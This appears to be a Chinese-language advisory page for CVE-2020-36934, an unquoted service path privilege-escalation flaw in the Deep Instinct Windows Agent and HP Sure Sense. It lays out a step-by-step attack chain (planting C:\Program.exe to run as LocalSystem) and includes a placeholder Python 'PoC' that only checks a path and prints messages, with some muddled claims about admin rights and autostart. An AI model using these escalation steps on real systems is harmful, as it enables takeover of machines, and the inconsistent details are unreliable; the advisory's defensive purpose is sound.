CVE-2020-36934 | Deep Instinct Windows Agent 未引号服务路径提权漏洞

漏洞信息

漏洞编号

CVE-2020-36934

漏洞类型

未引号服务路径漏洞

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Deep Instinct Windows Agent, HP Sure Sense

漏洞概述

CVE-2020-36934是Deep Instinct公司Windows Agent软件中的一个高危安全漏洞，CVSS评分达到7.8分。该漏洞存在于DeepNetworkService服务中，由于其可执行文件路径未使用引号包裹，存在未引号服务路径（Unquoted Service Path）安全风险。攻击者可以通过在服务路径的中间目录中植入恶意可执行文件，当服务启动时利用Windows服务加载顺序执行恶意代码。由于该服务以LocalSystem权限运行，攻击成功后可获得系统最高权限，实现权限提升。该漏洞影响HP Sure Sense等集成了Deep Instinct安全解决方案的企业设备，攻击者可利用此漏洞在本地环境中进行横向移动和持久化控制。

技术细节

未引号服务路径漏洞是一种Windows本地权限提升漏洞。当Windows服务配置的可执行文件路径包含空格且未使用引号包裹时，操作系统会按照路径中空格分割的顺序依次查找并执行程序。例如，路径C:\Program Files\HP Sure Sense\DeepNetworkService.exe未加引号时，Windows会首先尝试执行C:\Program.exe，如果不存在则继续尝试C:\Program Files\HP.exe，依此类推直到找到实际的可执行文件。攻击者可以在C:\Program.exe位置植入恶意可执行文件，并将其添加到系统自启动项或计划任务中。由于服务以LocalSystem（最高权限）身份运行，恶意代码也将以系统权限执行，从而实现权限提升。攻击者通常需要提前获得目标系统的普通用户访问权限，然后利用此漏洞获取系统完全控制权。

攻击链分析

STEP 1

信息收集

攻击者获取目标系统的普通用户访问权限，使用wmic或sc命令查询系统服务配置，发现DeepNetworkService服务存在未引号路径C:\Program Files\HP Sure Sense\DeepNetworkService.exe

STEP 2

路径分析

分析可执行文件路径中的空格位置，确定Windows服务加载顺序。路径中C:\Program Files\HP Sure Sense\存在多个可被利用的中间路径点

STEP 3

恶意程序植入

将恶意可执行文件（如Program.exe或HP.exe）写入C:\根目录或相应中间目录，该文件会在目标服务启动时被优先执行

STEP 4

权限提升

等待服务重启或触发服务启动，由于服务以LocalSystem身份运行，植入的恶意程序继承系统最高权限，实现本地权限提升

STEP 5

持久化控制

攻击者在获得系统权限后，可进一步植入后门、窃取敏感数据、建立持久化控制通道，完成完整的攻击链

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2020-36934 PoC - Unquoted Service Path Exploitation
# Target: DeepNetworkService.exe in C:\Program Files\HP Sure Sense\
# This PoC demonstrates how to exploit the unquoted service path vulnerability

import os
import sys
import shutil
import time

def check_vulnerability():
    """Check if the vulnerable service path exists"""
    service_path = r'C:\Program Files\HP Sure Sense\DeepNetworkService.exe'
    # Check if the service binary exists
    if os.path.exists(service_path):
        print(f"[+] Vulnerable service binary found: {service_path}")
        return True
    else:
        print(f"[-] Service binary not found")
        return False

def create_malicious_executable():
    """Create a malicious executable to be placed at unquoted path location"""
    # This would be the attacker's malicious payload
    # In real attack, this could be a reverse shell or other malware
    malicious_path = r'C:\Program.exe'
    
    # Create a simple executable (placeholder for actual malware)
    # The attacker would replace this with actual malicious code
    print(f"[*] Malicious executable would be placed at: {malicious_path}")
    print("[*] When DeepNetworkService starts, it may execute this file first")
    print("[*] The malicious code would run with LocalSystem privileges")
    
    return True

def main():
    print("="*60)
    print("CVE-2020-36934 - Unquoted Service Path Exploitation PoC")
    print("="*60)
    
    # Check if running with appropriate privileges
    if os.name == 'nt':
        try:
            import ctypes
            is_admin = ctypes.windll.shell32.IsUserAnAdmin()
            if not is_admin:
                print("[-] This exploit requires local user access")
                print("[-] Administrator privileges needed for full exploitation")
        except:
            pass
    
    if check_vulnerability():
        create_malicious_executable()
        print("\n[!] Note: This is for educational purposes only")
        print("[!] Actual exploitation requires proper malware and persistence mechanism")

if __name__ == "__main__":
    main()

影响范围

Deep Instinct Windows Agent < 1.2.24.0

HP Sure Sense (搭载Deep Instinct解决方案的所有版本)

防御指南

临时缓解措施

立即检查系统是否存在C:\Program.exe、C:\Program Files\HP.exe等可疑可执行文件，并将其删除。同时限制普通用户对关键目录的写入权限，联系Deep Instinct官方获取安全更新补丁。